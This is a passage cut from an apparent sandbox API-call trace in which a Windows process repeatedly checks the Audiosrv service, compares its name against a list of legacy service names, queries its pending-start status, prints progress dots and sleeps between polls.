_String2="SQLSERVER") returned -18 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0168.792] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0168.792] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0168.792] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0168.792] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0168.792] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0168.792] wcsncpy_s (in: _Destination=0x312527e, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0168.792] wcsncpy_s (in: _Destination=0x312526c, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0168.792] NetApiBufferFree (Buffer=0x3118778) returned 0x0 [0168.792] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x30bf700 | out: _Buffer=".") returned 1 [0168.792] GetFileType (hFile=0x90) returned 0x2 [0168.792] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf6ec | out: lpMode=0x30bf6ec) returned 1 [0170.330] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x30bf6f0, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf6f0*=0x1) returned 1 [0171.775] Sleep (dwMilliseconds=0x9c4) [0174.946] NetApiBufferFree (Buffer=0x31250b0) returned 0x0 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0174.946] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0174.947] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0174.947] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0174.947] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0174.947] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0174.947] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3120828 [0174.947] OpenServiceW (hSCManager=0x3120828, lpServiceName="Audiosrv", dwDesiredAccess=0x84) returned 0x31206e8 [0174.947] ControlService (in: hService=0x31206e8, dwControl=0x4, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x7, dwWaitHint=0x1388)) returned 0 [0174.948] GetLastError () returned 0x425 [0174.948] QueryServiceStatus (in: hService=0x31206e8, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x7, dwWaitHint=0x1388)) returned 1 [0174.948] LocalAlloc (uFlags=0x40, uBytes=0x2e) returned 0x31189a8 [0174.948] wcscpy_s (in: _Destination=0x31189c4, _SizeInWords=0x9, _Source="Audiosrv" | out: _Destination="Audiosrv") returned 0x0 [0174.948] CloseServiceHandle (hSCObject=0x3120828) returned 1 [0174.948] CloseServiceHandle (hSCObject=0x31206e8) returned 1 [0174.948] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30bf6e8 | out: Buffer=0x30bf6e8*=0x31250b0) returned 0x0 [0174.948] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0174.948] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0174.948] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0174.948] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0174.948] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0174.948] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0174.948] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0174.948] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0174.949] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0174.949] wcsncpy_s (in: _Destination=0x312527e, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0174.949] wcsncpy_s (in: _Destination=0x312526c, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0174.949] NetApiBufferFree (Buffer=0x31189a8) returned 0x0 [0174.949] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x30bf700 | out: _Buffer=".") returned 1 [0174.949] GetFileType (hFile=0x90) returned 0x2 [0174.949] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf6ec | out: lpMode=0x30bf6ec) returned 1 [0176.336] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x30bf6f0, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf6f0*=0x1) returned 1 [0178.180] Sleep (dwMilliseconds=0x9c4) [0180.971] NetApiBufferFree (Buffer=0x31250b0) returned 0x0 [0180.971] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0180.971] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0180.971] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0180.971] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0180.971] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0180.971] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0180.971] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0180.971] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0180.972] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0180.972] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3120918 [0180.973] OpenServiceW (hSCManager=0x3120918, lpServiceName="Audiosrv", dwDesiredAccess=0x84) returned 0x3120850 [0180.973] ControlService (in: hService=0x3120850, dwControl=0x4, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x8, dwWaitHint=0x1388)) returned 0 [0180.973] GetLastError () returned 0x425 [0180.973] QueryServiceStatus (in: hService=0x3120850, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x8, dwWaitHint=0x1388)) returned 1 [0180.974] LocalAlloc (uFlags=0x40, uBytes=0x2e) returned 0x3118778 [0180.974] wcscpy_s (in: _Destination=0x3118794, _SizeInWords=0x9, _Source="Audiosrv" | out: _Destination="Audiosrv") returned 0x0 [0180.974] CloseServiceHandle (hSCObject=0x3120918) returned 1 [0180.974] CloseServiceHandle (hSCObject=0x3120850) returned 1 [0180.974] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30bf6e8 | out: Buffer=0x30bf6e8*=0x31250b0) returned 0x0 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0180.974] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0180.975] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0180.975] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0180.975] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0180.975] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0180.975] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0180.975] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0180.975] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0180.975] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0180.975] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0180.975] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0180.975] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0180.975] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0180.975] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0180.975] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0180.975] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0180.975] wcsncpy_s (in: _Destination=0x312527e, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0180.975] wcsncpy_s (in: _Destination=0x312526c, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0180.975] NetApiBufferFree (Buffer=0x3118778) returned 0x0 [0180.975] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x30bf700 | out: _Buffer=".") returned 1 [0180.975] GetFileType (hFile=0x90) returned 0x2 [0180.975] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf6ec | out: lpMode=0x30bf6ec) returned 1 [0181.790] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x30bf6f0, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf6f0*=0x1) returned 1 [0182.273] Sleep (dwMilliseconds=0x9c4) [0184.810] NetApiBufferFree (Buffer=0x31250b0) returned 0x0 [0184.810] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0184.810] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0184.810] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0184.811] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0184.811] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3120788 [0184.812] OpenServiceW (hSCManager=0x3120788, lpServiceName="Audiosrv", dwDesiredAccess=0x84) returned 0x3120940 [0184.812] ControlService (in: hService=0x3120940, dwControl=0x4, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x9, dwWaitHint=0x1388)) returned 0 [0184.812] GetLastError () returned 0x425 [0184.813] QueryServiceStatus (in: hService=0x3120940, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x9, dwWaitHint=0x1388)) returned 1 [0184.813] LocalAlloc (uFlags=0x40, uBytes=0x2e) returned 0x3118698 [0184.813] wcscpy_s (in: _Destination=0x31186b4, _SizeInWords=0x9, _Source="Audiosrv" | out: _Destination="Audiosrv") returned 0x0 [0184.813] CloseServiceHandle (hSCObject=0x3120788) returned 1 [0184.813] CloseServiceHandle (hSCObject=0x3120940) returned 1 [0184.813] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30bf6e8 | out: Buffer=0x30bf6e8*=0x31250b0) returned 0x0 [0184.813] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0184.813] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0184.813] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0184.813] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0184.813] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0184.813] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0184.813] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0184.813] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0184.813] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0184.813] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0184.813] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0184.814] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0184.814] wcsncpy_s (in: _Destination=0x312527e, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0184.814] wcsncpy_s (in: _Destination=0x312526c, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0184.814] NetApiBufferFree (Buffer=0x3118698) returned 0x0 [0184.814] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x30bf700 | out: _Buffer=".") returned 1 [0184.814] GetFileType (hFile=0x90) returned 0x2 [0184.814] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf6ec | out: lpMode=0x30bf6ec) returned 1 [0185.019] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x30bf6f0, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf6f0*=0x1) returned 1 [0185.630] Sleep (dwMilliseconds=0x9c4) [0188.555] NetApiBufferFree (Buffer=0x31250b0) returned 0x0 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0188.555] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0188.556] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0188.556] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0188.556] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0188.556] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0188.556] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0188.556] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0188.556] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0188.556] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0188.556] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0188.556] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0188.556] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0188.556] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned 